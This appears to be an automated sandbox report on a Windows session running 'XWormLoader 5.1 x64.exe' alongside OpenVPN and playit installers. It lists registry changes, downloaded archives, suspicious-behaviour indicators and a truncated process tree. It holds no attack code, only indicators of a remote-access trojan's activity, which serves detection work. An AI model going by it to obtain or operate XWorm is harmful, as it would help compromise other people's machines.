description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\OpenVPNFile\shell\open\command msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B66371C8B348CD94CAB147D82C460EF6\InstanceType = "0" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" openvpn-gui.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ openvpn-gui.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg openvpn-gui.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell XWormLoader 5.1 x64.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.WindowsTerminal_8wekyb3d8bbwe\StartTerminalOnLoginTask Taskmgr.exe Key created \REGISTRY\MACHINE\Software\Classes\OpenVPNFile\shell\run\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B840472895FFCC7408A2A8E736522D5D\ProductIcon = "C:\\Windows\\Installer\\{8274048B-FF59-47CC-802A-8A7E6325D2D5}\\openvpn.ico" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B840472895FFCC7408A2A8E736522D5D\AuthorizedLUAApp = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B66371C8B348CD94CAB147D82C460EF6\DeploymentFlags = "3" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" openvpn-gui.exe Set value (int) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" openvpn-gui.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ XWormLoader 5.1 x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\B840472895FFCC7408A2A8E736522D5D\OpenVPN.GUI = "OpenVPN" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B840472895FFCC7408A2A8E736522D5D\SourceList\Media\1 = ";" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B840472895FFCC7408A2A8E736522D5D\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\Downloads\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B66371C8B348CD94CAB147D82C460EF6\SourceList\Media\DiskPrompt = "Playit Installation" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" openvpn-gui.exe Set value (data) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 openvpn-gui.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} openvpn-gui.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 XWormLoader 5.1 x64.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings chrome.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\B840472895FFCC7408A2A8E736522D5D\OpenVPN.Service = "OpenVPN" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\B840472895FFCC7408A2A8E736522D5D\Drivers msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B840472895FFCC7408A2A8E736522D5D\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" openvpn-gui.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags XWormLoader 5.1 x64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" XWormLoader 5.1 x64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" XWormLoader 5.1 x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\OpenVPNFile\shell\open\command\ = "\"notepad.exe\" \"%1\"" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\OpenVPNFile\shell msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\OpenVPNFile\shell\open msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B840472895FFCC7408A2A8E736522D5D\InstanceType = "0" msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 openvpn-gui.exe Set value (data) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 openvpn-gui.exe Set value (int) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2" openvpn-gui.exe Set value (int) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" openvpn-gui.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\B840472895FFCC7408A2A8E736522D5D\Drivers.OvpnDco = "Drivers" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\B840472895FFCC7408A2A8E736522D5D\EasyRSA = "\x06OpenSSL" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" openvpn-gui.exe Set value (int) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" openvpn-gui.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} XWormLoader 5.1 x64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" XWormLoader 5.1 x64.exe Set value (str) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\ef\ = "json_auto_file" OpenWith.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\B840472895FFCC7408A2A8E736522D5D\OpenVPN.Documentation = "OpenVPN" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\B840472895FFCC7408A2A8E736522D5D\OpenVPN.GUI.OnLogon = "OpenVPN.GUI" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B840472895FFCC7408A2A8E736522D5D\SourceList\Net\1 = "C:\\Users\\Admin\\Downloads\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B66371C8B348CD94CAB147D82C460EF6\Version = "983066" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B66371C8B348CD94CAB147D82C460EF6\SourceList\PackageName = "playit-windows-x86_64-signed.msi" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B66371C8B348CD94CAB147D82C460EF6\Clients = 3a0000000000 msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 openvpn-gui.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 XWormLoader 5.1 x64.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B840472895FFCC7408A2A8E736522D5D\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\B66371C8B348CD94CAB147D82C460EF6\Binaries msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 openvpn-gui.exe Set value (data) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff openvpn-gui.exe Set value (data) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 XWormLoader 5.1 x64.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8 XWormLoader 5.1 x64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" XWormLoader 5.1 x64.exe Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell openvpn-gui.exe Key created \REGISTRY\MACHINE\Software\Classes\OpenVPNFile msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B840472895FFCC7408A2A8E736522D5D\PackageCode = "7D2338510D0D5244089EBE9FFBD528D1" msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 openvpn-gui.exe -
NTFS ADS 5 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\sadsadsd.first.ovpn:Zone.Identifier chrome.exe File created C:\Users\Admin\OpenVPN\config\sadsadsd.first\sadsadsd.first.ovpn\:Zone.Identifier:$DATA openvpn-gui.exe File opened for modification C:\Users\Admin\Downloads\XWorm v5.1-5.2.7z:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\OpenVPN-2.6.13-I001-amd64.msi:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\playit-windows-x86_64-signed.msi:Zone.Identifier chrome.exe -
Opens file in notepad (likely ransom note) 2 IoCs
pid Process 4508 NOTEPAD.EXE 5200 NOTEPAD.EXE -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3616 WINWORD.EXE 3616 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1308 chrome.exe 1308 chrome.exe 2000 msiexec.exe 2000 msiexec.exe 5720 chrome.exe 5720 chrome.exe 5720 chrome.exe 5720 chrome.exe 2000 msiexec.exe 2000 msiexec.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 1952 Taskmgr.exe 1952 Taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
pid Process 5184 openvpn-gui.exe 5624 XWormLoader 5.1 x64.exe 1128 OpenWith.exe 1308 chrome.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid 4 -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 49 IoCs
pid Process 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 2336 chrome.exe 2336 chrome.exe 2336 chrome.exe 2336 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 1308 chrome.exe Token: SeCreatePagefilePrivilege 1308 chrome.exe Token: SeShutdownPrivilege 72 msiexec.exe Token: SeIncreaseQuotaPrivilege 72 msiexec.exe Token: SeSecurityPrivilege 2000 msiexec.exe Token: SeCreateTokenPrivilege 72 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 72 msiexec.exe Token: SeLockMemoryPrivilege 72 msiexec.exe Token: SeIncreaseQuotaPrivilege 72 msiexec.exe Token: SeMachineAccountPrivilege 72 msiexec.exe Token: SeTcbPrivilege 72 msiexec.exe Token: SeSecurityPrivilege 72 msiexec.exe Token: SeTakeOwnershipPrivilege 72 msiexec.exe Token: SeLoadDriverPrivilege 72 msiexec.exe Token: SeSystemProfilePrivilege 72 msiexec.exe Token: SeSystemtimePrivilege 72 msiexec.exe Token: SeProfSingleProcessPrivilege 72 msiexec.exe Token: SeIncBasePriorityPrivilege 72 msiexec.exe Token: SeCreatePagefilePrivilege 72 msiexec.exe Token: SeCreatePermanentPrivilege 72 msiexec.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 72 msiexec.exe 72 msiexec.exe 5184 openvpn-gui.exe 5184 openvpn-gui.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 2056 msiexec.exe 2056 msiexec.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 5184 openvpn-gui.exe 5184 openvpn-gui.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 5184 openvpn-gui.exe 5184 openvpn-gui.exe 5184 openvpn-gui.exe 5184 openvpn-gui.exe 5184 openvpn-gui.exe 5184 openvpn-gui.exe 5184 openvpn-gui.exe 5184 openvpn-gui.exe 5184 openvpn-gui.exe 5184 openvpn-gui.exe 5184 openvpn-gui.exe 1308 chrome.exe 1308 chrome.exe 5624 XWormLoader 5.1 x64.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 1308 chrome.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe 4536 Taskmgr.exe -
Suspicious use of SetWindowsHookEx 34 IoCs
pid Process 5184 openvpn-gui.exe 704 MiniSearchHost.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 1128 OpenWith.exe 1128 OpenWith.exe 1128 OpenWith.exe 1128 OpenWith.exe 1128 OpenWith.exe 1128 OpenWith.exe 1128 OpenWith.exe 1128 OpenWith.exe 1128 OpenWith.exe 1128 OpenWith.exe 1128 OpenWith.exe 1128 OpenWith.exe 1128 OpenWith.exe 3748 firefox.exe 7136 firefox.exe 7068 firefox.exe 2084 CredentialUIBroker.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 5624 XWormLoader 5.1 x64.exe 3616 WINWORD.EXE 3616 WINWORD.EXE 3616 WINWORD.EXE 3616 WINWORD.EXE 3616 WINWORD.EXE 3616 WINWORD.EXE 3616 WINWORD.EXE 6940 WindowsTerminal.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4972 wrote to memory of 4508 4972 cmd.exe 86 PID 4972 wrote to memory of 4508 4972 cmd.exe 86 PID 1308 wrote to memory of 1476 1308 chrome.exe 91 PID 1308 wrote to memory of 1476 1308 chrome.exe 91 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 2272 1308 chrome.exe 92 PID 1308 wrote to memory of 3120 1308 chrome.exe 93 PID 1308 wrote to memory of 3120 1308 chrome.exe 93 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 PID 1308 wrote to memory of 3680 1308 chrome.exe 94 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\test.txt1⤵
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\test.txt2⤵
- Opens file in notepad (likely ransom note)
PID:4508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=5148,i,8761251365550662630,14794322401737333251,262144 --variations-seed-version --mojo-platform-channel-handle=3736 /prefetch:141⤵PID:3080
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1308 -
